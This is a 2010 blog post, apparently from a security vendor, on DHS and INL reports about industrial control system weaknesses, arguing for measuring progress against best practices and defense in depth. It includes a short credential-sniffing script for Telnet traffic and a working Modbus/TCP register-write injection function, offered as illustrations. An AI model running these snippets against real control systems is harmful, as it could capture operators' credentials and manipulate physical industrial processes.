2010-12-30

ICS Security Progress Masked by Vulnerability Reports

(This article was originally published on the Findings From the Field blog.)

I just finished looking through two government reports from earlier this year on cyber security vulnerabilities: the DHS Control Systems Security Program (CSSP) Common Cyber Security Vulnerabilities Observed in DHS Industrial Control Systems Assessments and the Idaho National Laboratory (INL) National SCADA Test Bed (NSTB) Assessments Summary Report: Common Industrial Control System Cyber Security Weaknesses. The reports have a lot of similarities and are useful, to a degree. A casual reading of the reports, however, suggests that we've made no progress in securing important control systems. This is incorrect - much progress has been made. What we really need to measure ICS security progress is not lists of high-priority vulnerabilities, but rather reports quantifying deviations from best practices and defense-in-depth postures.

The INL Report

The INL report describes the results of some 24 evaluations of control systems on the INL ICS testbed. Since the evaluations were of "vanilla" systems provided by vendors for testing, the scope of the vulnerabilities is limited to what vendors can do to make their systems stronger. The INL top-ten findings are:
  1. Unpatched OS vulnerabilities
  2. Vulnerable remote display protocols
  3. Web HMI vulnerabilities
  4. ICS services: buffer overflow vulnerabilities
  5. ICS applications: improper authentication
  6. ICS applications: improper access control
  7. Use of standard IT protocols with clear-text authentication
  8. ICS application protocols: unprotected transport of credentials
  9. ICS control protocols: vulnerable to message manipulation and injection
  10. Historians: vulnerable to SQL injection
Most of this is old news, and can be summarized as: ICS applications ship on or require the use of older, unpatched versions of operating systems, the applications themselves are vulnerable to lots of attacks, and extensive use of plain text protocols makes credential capture and protocol manipulation straightforward.
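
To make the cleartext exposure concrete, here is a minimal sketch - my own illustration, not taken from the report - of how little effort credential capture takes. It assumes Python with the scapy library, a monitoring position on the control network, and Telnet-style traffic on TCP port 23; any cleartext protocol is equally exposed:

    # Minimal sketch: observing cleartext credentials on the wire.
    # Requires root/administrator privileges to open a capture socket.
    from scapy.all import sniff, Raw

    def show_payload(pkt):
        """Print any raw payload seen on the Telnet port."""
        if pkt.haslayer(Raw):
            # Usernames and passwords appear here as ordinary bytes -
            # no decryption or reverse engineering is required.
            print(pkt[Raw].load.decode("ascii", errors="replace"), end="")

    sniff(filter="tcp port 23", prn=show_payload, store=0)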

The two interesting items are the remote display protocols finding and the discussion of proprietary protocols. The remote display protocols finding is surprising because I did not realize that product offerings made routine use of remote desktop tools. Industrial Defender's own security assessors routinely find weak remote desktop tools and protocols in use, but I had assumed these tools were set up by systems integrators or end users, not shipped as a standard part of control systems offerings. The discussion of proprietary protocols was interesting as well. INL observed that proprietary protocols are not significantly more secure than open, widely documented protocols: INL researchers were able to manipulate even proprietary protocols after only a little study of packet traces, without serious reverse-engineering effort.
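
As an illustration of how little the wire protocol pushes back, consider message injection against Modbus/TCP, an open cleartext control protocol. The reports name no specific protocol; Modbus and the host, unit, and register values below are my own illustrative choices, and per INL's findings a proprietary cleartext protocol would require only slightly more study of packet traces:

    # Minimal sketch: injecting a command into an unauthenticated,
    # cleartext control protocol (Modbus/TCP, function 0x06).
    import socket
    import struct

    def write_single_register(host, unit_id, address, value):
        """Send a Modbus 'write single register' request and return the reply."""
        pdu = struct.pack(">BHH", 0x06, address, value)    # function, addr, value
        # MBAP header: transaction id, protocol id (0), length, unit id
        mbap = struct.pack(">HHHB", 1, 0, len(pdu) + 1, unit_id)
        with socket.create_connection((host, 502), timeout=5) as s:
            s.sendall(mbap + pdu)
            return s.recv(256)   # on success, the device echoes the request

    # Nothing in the protocol authenticates the sender; any host that can
    # reach port 502 can issue this write. Values below are placeholders.
    # write_single_register("192.0.2.10", unit_id=1, address=100, value=1)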

The CSSP Report

The CSSP report describes the results of some 15 security assessments, both of a small number of vendor-supplied setups in a lab and of control systems in the field. As expected, the vendor findings are less comprehensive than the INL report's, and I won't go into them. The value of the CSSP report is its configuration and network findings. The findings are:

Configuration:
  1. Poor patch management
  2. Weak passwords/authentication configured
  3. Information disclosure of user credentials and other information
Network:
  1. Poor or non-existent network segmentation
  2. Improper firewall configuration
None of these are surprises.
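
For the network findings in particular, the gap is easy to demonstrate. Below is a minimal sketch - mine, not the report's - of a segmentation spot-check run from an enterprise host; the addresses are illustrative placeholders and the port list covers a few common ICS services:

    # Minimal sketch: spot-checking segmentation from the enterprise side.
    # A properly segmented network should block every one of these
    # connections; any success is a finding.
    import socket

    CONTROL_HOSTS = ["192.0.2.10", "192.0.2.11"]   # hypothetical control-net hosts
    ICS_PORTS = [102, 502, 20000, 44818]           # S7, Modbus, DNP3, EtherNet/IP

    for host in CONTROL_HOSTS:
        for port in ICS_PORTS:
            try:
                with socket.create_connection((host, port), timeout=2):
                    print(f"REACHABLE: {host}:{port} - segmentation gap")
            except OSError:
                pass   # blocked or unreachable - the desired outcome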

Lies, Damned Lies, ...

These findings differ very little from what security assessors were discussing informally in presentations as long as 5-7 years ago, though back then no reports this systematic were easily available. Some of the apparent lack of progress is understandable - the problem of patching control systems and their operating systems is one of the most costly security problems to solve, both for vendors and for owners/operators. The same is true of the use of plain text protocols to communicate with field equipment - these protocols will take decades to eliminate completely.

I think this picture is misleading. The reports really do not reflect the many changes that have occurred in this field in the last half decade:
  • Most sites now have firewalls separating plant networks from enterprise networks.
  • The largest ICS vendors now support anti-virus technologies, which are routinely deployed with new and upgraded control systems.
  • Many sites are now using VPNs for remote access to critical networks.
  • Many sites now have patch programs, though these are fewer and less comprehensive than corporate IT programs.
  • Many sites have implemented log aggregation and review practices, and some have gone as far as security event monitoring systems.
  • Many sites now have formal security programs, audits, budgets and staff.
These developments are poorly reflected in reports summarizing "highest priority vulnerabilities." Some of these developments represent quantitative trends in vulnerabilities, but as long as even a minority of sites lack firewalls, for example, the absence of firewalls will continue to be flagged as a high-priority finding in reports such as these. Trends showing what fraction of sites and what fraction of products exhibit how many vulnerabilities over time would help us better understand the progress being made.

At a deeper level though, many of the changes we've seen address defense-in-depth postures rather than vulnerabilities. The authors of the reports clearly understand that defense-in-depth is important; both the INL and CSSP reports touch on defense-in-depth topics in their "recommendations" sections. For example, the reports discuss and recommend measures like anti-virus and intrusion detection technologies, even though these technologies do nothing to reduce vulnerability counts or severities.

To see progress in this field, what we need are regular, quantitative summary reports of how sites differ from security standards or from established best practices, rather than summaries of serious vulnerabilities. For example, a quantitative summary of NERC-CIP audit findings would be a step in this direction, since the NERC-CIP regulations describe a complete security program. Vulnerability severities and counts are only one measure of a security program. If you patch everything, encrypt everything, and configure everything correctly, and thus reduce the known vulnerability count to zero, you still may not have a strong defense-in-depth posture. Defense-in-depth includes intrusion detection, intrusion prevention, event monitoring, a strong security program and other measures, not just the elimination of vulnerabilities. We need better yardsticks if we are to measure progress in securing control systems.

1 comment:

  1. It is also important to remember that while these systems have inherent vulnerabilities, additional vulnerabilities are introduced by those responsible for programming/integrating these control systems.
